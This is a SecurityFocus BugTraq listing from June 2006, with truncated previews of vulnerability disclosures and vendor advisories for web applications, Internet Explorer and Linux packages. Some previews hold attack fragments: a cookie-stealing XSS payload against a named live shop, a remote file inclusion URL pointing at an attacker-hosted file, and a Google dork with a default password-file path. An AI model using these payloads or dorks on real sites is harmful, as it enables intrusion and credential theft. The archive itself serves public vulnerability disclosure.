SecurityFocus

wbb<<--v 2.1.6 "profile.php" SQL injection 2006-06-14
CrAzY CrAcKeR hotmail com

==============================================

Discovered By: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Sw33t h4ck3r

Breeeeh-BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs

==============================================

Example:-

/wbb2/profi

[ more ] [ reply ]

[FSA016] ISPConfig 2.2.3, File inclusion vulnerability 2006-06-14
Federico Fazzi (federico autistici org)

-----------------------------------------------------
Advisory id: FSA:016

Author: Federico Fazzi
Date: 14/06/2006, 18:57
Sinthesis: ISPConfig 2.2.3, File inclusion vulnerability
Type: high
Product: http://www.ispconfig.org/
Patch: unavailable
-----------------------------------------

[ more ] [ reply ]

wbb<<--v 2.2.1 "studienplatztausch.php" SQL injection 2006-06-14
CrAzY CrAcKeR hotmail com

wbb<<--v 2.2.2 "thread.php" SQL injection 2006-06-14
CrAzY CrAcKeR hotmail com

=============================================

Discovered By: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Sw33t h4ck3r

Breeeeh-BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs

=============================================

Example:-

/wbb2/thread.

[ more ] [ reply ]

bbrss PhpBB (phpbb_root_path) Remote File Inclusion 2006-06-14
SpC-x Bsdmail Org

######################################################

# bbrss PhpBB (phpbb_root_path) Remote File Inclusion

######################################################

# Credit : SpC-x | The_BeKiR

# Site : http://wWw.SaVSaK.CoM

######################################################

# G

[ more ] [ reply ]

[ MDKSA-2006:100 ] - Updated gdm packages fix vulnerability 2006-06-14
security mandriva com

[ MDKSA-2006:099-1 ] - Updated freetype2 packages fixes multiple vulnerabilities. 2006-06-14
security mandriva com

Secunia Research: PicoZip "zipinfo.dll" Multiple Archives BufferOverflow 2006-06-14
Secunia Research (vuln-remove secunia com)

======================================================================

Secunia Research 14/06/2006

- PicoZip "zipinfo.dll" Multiple Archives Buffer Overflow -

======================================================================
Table of Contents

Affected Software....

[ more ] [ reply ]

Black Hat Speakers + 2005 Content on-line 2006-06-13
Jeff Moss (jmoss blackhat com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear BugTraq Readers,

The speaker selection for Black Hat USA 2006 is now complete. We have a
fantastic line up of Briefings presentations and our largest selection of
Training this year.
Briefings: http://www.blackhat.com/html/bh-usa-06/bh-usa-06-sch

[ more ] [ reply ]

[USN-299-1] dhcdbd vulnerability 2006-06-14
Martin Pitt (martin pitt canonical com)

===========================================================
Ubuntu Security Notice USN-299-1 June 13, 2006
dhcdbd vulnerability
https://launchpad.net/bugs/49104
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu

[ more ] [ reply ]

Secunia Resaerch: Internet Explorer Exception Handling MemoryCorruption Vulnerability 2006-06-14
Secunia Research (vuln-remove secunia com)

======================================================================

Secunia Research 14/06/2006

Internet Explorer Exception Handling Memory Corruption Vulnerability

======================================================================
Table of Contents

Affected Software

[ more ] [ reply ]

[USN-298-1] libgd2 vulnerability 2006-06-14
Martin Pitt (martin pitt canonical com)

===========================================================
Ubuntu Security Notice USN-298-1 June 13, 2006
libgd2 vulnerability
CVE-2006-2906
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ub

[ more ] [ reply ]

[USN-297-1] Thunderbird vulnerabilities 2006-06-14
Martin Pitt (martin pitt canonical com)

===========================================================
Ubuntu Security Notice USN-297-1 June 13, 2006
mozilla-thunderbird vulnerabilities
CVE-2006-2775, CVE-2006-2776, CVE-2006-2778, CVE-2006-2779,
CVE-2006-2780, CVE-2006-2781, CVE-2006-2783, CVE-2006-2786,
CVE-2006-2787
=========

[ more ] [ reply ]

Freeze Greetings Cards PWD.txt 2006-06-14
alp_eren ayyildiz org

SOFTWARE:

=========

Freeze Greetings

http://www.scriptsez.net/

DESCRIPTION:

============

google dork = "Powered by Freeze Greetings"

default password path http://www.site.com/freeze or path/PWD.txt

pwd file's password is encode the base64. pwd encode the base64 cracker and login to /

[ more ] [ reply ]

[USN-288-4] dovecot regression fix 2006-06-14
Martin Pitt (martin pitt canonical com)

===========================================================
Ubuntu Security Notice USN-288-4 June 13, 2006
dovecot regression
https://launchpad.net/bugs/49601
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.

[ more ] [ reply ]

Re: REMOTE FILE INCLUSION ( ALL ) 2006-06-14
Steven M. Christey (coley mitre org)

This post appears to have some errors.

What PHP version, environment, and operating system did you use to
test this? Did you use a real web site, or did you just look at the
source code?

When a variable is used in a require or include statement, you must
make sure that the variable can be contro

[ more ] [ reply ]

[MajorSecurity #17] SixCMS <= 6 - Multiple XSS and directory traversal vulnerabilities 2006-06-12
admin majorsecurity de

[MajorSecurity #17] SixCMS <= 6 - Multiple XSS and directory traversal vulnerabilities

----------------------------------------------

Software: SixCMS

Version: <=6

Type: Cross site scripting

Date: June, 12th 2006

Vendor: Six Offene Systeme GmbH

Page: http://www.sixcms.de

Cred

[ more ] [ reply ]

G Shout 1.3.1 Version - Remote File Include Vulnerability 2006-06-13
SpC-x Bsdmail Org

# SaVSaK.CoM | SpC-x - The_BeKiR |

# G Shout 1.3.1 Version - Remote File Include Vulnerability

# Risk : High

# Class: Remote

# Script : G Shout

# Credits : SpC-x

# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# include("config.php");

# include("./includes/funct

[ more ] [ reply ]

ZDI-06-018: Microsoft Internet Explorer DXImageTransform ActiveX Memory Corruption Vulnerability 2006-06-13
zdi-disclosures 3com com

ZDI-06-018: Microsoft Internet Explorer DXImageTransform ActiveX Memory
Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-018.html
June 13, 2006

-- CVE ID:
CVE-2006-1303

-- Affected Vendor:
Microsoft

-- Affected Products:
Internet Explorer 6 All Versions
Internet Explor

[ more ] [ reply ]

Simpleshout 1.6.0 Version - Remote File Include Vulnerability 2006-06-13
SpC-x Bsdmail Org

# SaVSaK.CoM | SpC-x - The_BeKiR |

# Simpleshout 1.6.0 Version - Remote File Include Vulnerability

# Risk : High

# Class: Remote

# Script : Simpleshout

# Credits : SpC-x

# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# // Require files

# require $config;

# V

[ more ] [ reply ]

Re: PaintedOver.com, Inc. 2004-2006 Xss Vulnerabilities 2006-06-13
reports paintedover com

This should be fixed now.

[ more ] [ reply ]

file include exploits in mcGuestbook 1.3 2006-06-13
gamr-14 hotmail com

Multiple file include exploits in mcGuestbook 1.3

script type : mcGuestbook 1.3

bug found by : sweet-devil

team : site-down

type : file include

####################################################

exploits :

admin.php

http://www.example.com/path/admin.php?lang=http://yoursite/r

[ more ] [ reply ]

Oracle DBMS_STANDARD security problem 2006-06-12
putosoft softputo (hasecorp hotmail com)

Hello,
I have been found a security problem in the DBMS_STANDARD package. Anyone
knowns any kind of workaround for this problem? You can't create a package
called DBMS_STANDARD and rename the old one to any other name to create an
envoltory so there is no way (I think) to solve it.
Any recomended

[ more ] [ reply ]

PhpMyFactures 1.0 Cross Site Scripting, SQL Injection, Full Path Disclosure and others 2006-06-10
gmdarkfig gmail com

PhpMyFactures 1.0

*****************

Full Path Disclosure

********************

[Guest] http://[...]/verif.php

[Guest] http://[...]/inc/footer.php

[Guest] http://[...]/remises/ajouter_remise.php

Informations modification

*************************

[Guest] http://[...]/tva/ajouter_tva

[ more ] [ reply ]

GamePlay.co.uk XSS 2006-06-10
charlie thehackersplace org

Homepage: www.gameplay.co.uk

Example:

http://shop.gameplay.co.uk/webstore/advanced_search.asp?Keyword=&terms=!
&badterm=<script>alert(document.cookie)</script>

Also...

The current password is not necessary for a successful password change for members of gameplay.co.uk which makes changing p

[ more ] [ reply ]

RE: Dell Openmanage CD Vulnerability 2006-06-09
Michael Scheidell (scheidell secnap net)

> -----Original Message-----
> From: wiz561 (at) gmail (dot) com [email concealed] [mailto:wiz561 (at) gmail (dot) com [email concealed]]
> Sent: Thursday, June 08, 2006 5:29 PM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: Dell Openmanage CD Vulnerability
>
>
> When you boot up using the Dell PowerEdge Installation and
> Server Management Disc (P/N: WG12

[ more ] [ reply ]

REMOTE FILE INCLUSION ( ALL ) 2006-06-13
SpC-x Bsdmail org

------------------------------------------------------------------------
---------------------------------------------------------

Credit : SpC-x

Mail : SpC-x (at) Bsdmail (dot) Org [email concealed]

------------------------------------------------------------------------
-------------------------------------------------------

[ more ] [ reply ]

Re: vbulletin.com Multiple XSS Vulnerabilities 2006-06-13
contact vbulletin com

These XSS vulnerabilities have all been detected and patched.

[ more ] [ reply ]